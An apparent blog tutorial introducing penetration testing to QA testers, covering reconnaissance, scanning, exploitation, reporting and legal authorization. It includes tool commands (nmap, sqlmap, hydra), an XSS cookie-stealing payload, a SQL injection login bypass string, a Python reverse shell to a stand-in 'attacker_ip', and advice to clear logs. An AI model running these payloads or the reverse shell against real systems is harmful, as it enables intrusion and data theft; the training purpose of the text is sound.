Penetration Testing Basics for QA Testers

Penetration testing transforms security knowledge from theoretical to practical by actively attempting to exploit vulnerabilities in controlled conditions. According to the Ponemon Institute’s 2023 Cost of a Data Breach Report, organizations that conduct regular penetration testing experience breaches that cost on average $1.6 million less than those that don’t — one of the highest ROI activities in security. According to a study by IBM Security, organizations with mature penetration testing programs detect vulnerabilities 54 days faster than those relying solely on automated scanning. For QA engineers expanding into security testing, penetration testing basics — reconnaissance, vulnerability scanning, exploitation, and reporting — form a systematic methodology that complements traditional functional testing.

TL;DR: Penetration testing follows a structured methodology: reconnaissance (information gathering), scanning (port/vulnerability scanning with nmap, Nessus), exploitation (attempting to exploit findings with Metasploit), post-exploitation (privilege escalation, lateral movement), and reporting (documented findings with risk ratings and remediation guidance).

Penetration Testing Phases #

1. Reconnaissance (Information Gathering) #

Passive Reconnaissance:

# WHOIS lookup
whois example.com

# DNS enumeration
dig example.com ANY
nslookup example.com

# Search engine reconnaissance
site:example.com
inurl:admin site:example.com

Active Reconnaissance:

# Port scanning
nmap -sV -p- example.com

# Service detection
nmap -sC -sV example.com

# OS detection
nmap -O example.com

2. Scanning and Enumeration #

# Network scanning
nmap -sn 192.168.1.0/24

# Vulnerability scanning
nmap --script vuln example.com

# Web application scanning
nikto -h https://example.com

# Directory enumeration
gobuster dir -u https://example.com -w /usr/share/wordlists/common.txt

3. Gaining Access (Exploitation) #

SQL Injection:

sqlmap -u "http://example.com/product?id=1" --batch --dbs

XSS Testing:

<script>alert(document.cookie)</script>

Authentication Bypass:

# Brute force
hydra -l admin -P passwords.txt example.com http-post-form

4. Maintaining Access #

Backdoor Creation (Educational):

# Reverse shell (for authorized testing only)
import socket, subprocess

s = socket.socket()
s.connect(("attacker_ip", 4444))
subprocess.call(["/bin/sh", "-i"], stdin=s.fileno(), stdout=s.fileno())

5. Covering Tracks #

• Clear logs
• Remove backdoors
• Document all activities

“The difference between a security scan and a penetration test is the same as the difference between looking at a lock and actually trying to pick it. Automated scanners find known patterns; penetration testers find the vulnerabilities your scanners weren’t looking for.” — Yuri Kan, Senior QA Lead

Testing Methodologies #

OWASP Testing Guide #

web_application_testing:
  information_gathering:

    - fingerprint_web_server
    - review_meta_files
    - enumerate_applications
    - identify_entry_points

  configuration_testing:

    - test_network_infrastructure
    - test_application_platform
    - test_file_extensions
    - test_backup_files

  authentication_testing:

    - test_credentials_transport
    - test_default_credentials
    - test_password_policy
    - test_account_lockout

PTES (Penetration Testing Execution Standard) #

ptes_phases:
  pre_engagement:

    - scope_definition
    - rules_of_engagement
    - authorization

  intelligence_gathering:

    - passive_recon
    - active_recon
    - human_intelligence

  threat_modeling:

    - business_asset_analysis
    - threat_capability_analysis
    - attack_surface_analysis

Essential Tools #

Practical Examples #

Web Application Pentest #

# 1. Reconnaissance
nmap -sV example.com

# 2. Web server fingerprinting
whatweb https://example.com

# 3. Directory discovery
dirb https://example.com

# 4. Vulnerability scanning
nikto -h https://example.com

# 5. SQL (as discussed in [SQL Injection and XSS: Finding Vulnerabilities](/blog/sql-injection-xss)) injection testing
sqlmap -u "https://example.com/search?q=test"

# 6. XSS testing
# Manual payloads in search fields, forms

Network Pentest #

# 1. Network discovery
nmap -sn 192.168.1.0/24

# 2. Port scanning
nmap -p- -T4 192.168.1.100

# 3. Service enumeration
nmap -sC -sV 192.168.1.100

# 4. Vulnerability assessment
nmap --script vuln 192.168.1.100

# 5. Exploitation
# Use Metasploit or manual exploit

Reporting #

Executive Summary #

## Penetration Test Summary

**Test Date:** 2025-10-03
**Tester:** QA Security Team
**Scope:** example.com web application

### Findings Overview
- **Critical:** 2
- **High:** 5
- **Medium:** 8
- **Low:** 12

### Key Risks
1. SQL Injection in login form (Critical)
2. Stored XSS in comments (Critical)
3. Weak password policy (High)

Technical Findings #

finding_001:
  title: "SQL Injection in Authentication"
  severity: CRITICAL
  cvss_score: 9.8

  description: |
    The login form is vulnerable to SQL injection,
    allowing authentication bypass.

  steps_to_reproduce:

    1. Navigate to /login
    2. Enter username: admin' OR '1'='1
    3. Enter any password
    4. Click login

  impact:

    - Complete authentication bypass
    - Unauthorized access to admin panel
    - Potential data breach

  remediation:

    - Use parameterized queries
    - Implement input validation
    - Add WAF rules

  evidence:

    - screenshot_1.png
    - request_response.txt

Ethical Considerations #

Legal Requirements #

authorization_checklist:

  - [ ] Written permission obtained
  - [ ] Scope clearly defined
  - [ ] Rules of engagement documented
  - [ ] Emergency contact established
  - [ ] Non-disclosure agreement signed
  - [ ] Insurance verified

Best Practices #

1. Always Get Authorization: Never test without explicit permission
2. Define Scope: Test only authorized systems
3. Document Everything: Keep detailed logs
4. Report Responsibly: Follow disclosure protocols
5. Avoid Damage: Don’t disrupt production systems

Conclusion #

Penetration testing is a critical skill for security-focused QA professionals. Understanding pentesting methodologies, tools, and ethical considerations enables QA teams to identify and help remediate vulnerabilities before they can be exploited maliciously.

Key Takeaways:

• Follow structured methodologies (OWASP, PTES)
• Use appropriate tools for each phase
• Always obtain proper authorization
• Document findings thoroughly
• Report vulnerabilities responsibly
• Continuously update skills and knowledge

Remember: The goal is to improve security, not exploit it. Always conduct pentesting ethically and legally.

Official Resources #

• Web Performance
• Core Web Vitals
• CI/CD Best Practices

FAQ #

What is the penetration testing methodology? #

Standard pentesting phases: 1. Planning (scope, rules of engagement, legal authorization). 2. Reconnaissance (passive: OSINT, DNS, whois; active: port scanning, service enumeration). 3. Scanning (vulnerability scanning with Nessus, OpenVAS). 4. Exploitation (attempting exploits with Metasploit, Burp Suite). 5. Post-exploitation (persistence, lateral movement). 6. Reporting (findings, CVSS scores, remediation steps).

What tools are essential for beginning penetration testers? #

Essential toolkit: Kali Linux (pre-installed security tools), nmap (port and service discovery), Burp Suite Community (web application testing), Metasploit Framework (exploitation framework), Nikto (web server scanner), OWASP ZAP (web app scanner), Wireshark (traffic analysis), and John the Ripper/Hashcat (password testing). Start with Kali Linux — it includes all of these.

What is the legal and ethical framework for penetration testing? #

Always have explicit written authorization before testing. Define scope precisely (which IP ranges, systems, applications). Never test systems you don’t own or have permission to test. Use bug bounty programs (HackerOne, Bugcrowd) for legal target practice. In a professional context, a penetration test agreement (PTA) defines scope, methodology, and liability limitations.

How is penetration testing different from vulnerability scanning? #

Vulnerability scanning is automated — tools like Nessus or OpenVAS scan for known CVEs and configuration issues and produce a report. Penetration testing is manual and creative — a tester actively tries to exploit vulnerabilities, chain weaknesses together, and simulate real attacker behavior. Scans produce false positives; penetration tests verify actual exploitability.

See Also #

• Burp Suite for QA Engineers: Complete Security Testing Guide - Security testing with Burp: proxy setup, scanner, intruder,…
• Load Testing with JMeter: Complete Guide - Apache JMeter mastery: thread groups, samplers, listeners,…
• DDoS Testing: Testing System Resilience - Test DDoS resilience: attack simulation, rate limiting, CDN…
• Database Testing Deep Dive: From Integrity to Performance - Comprehensive guide to database testing: data integrity and…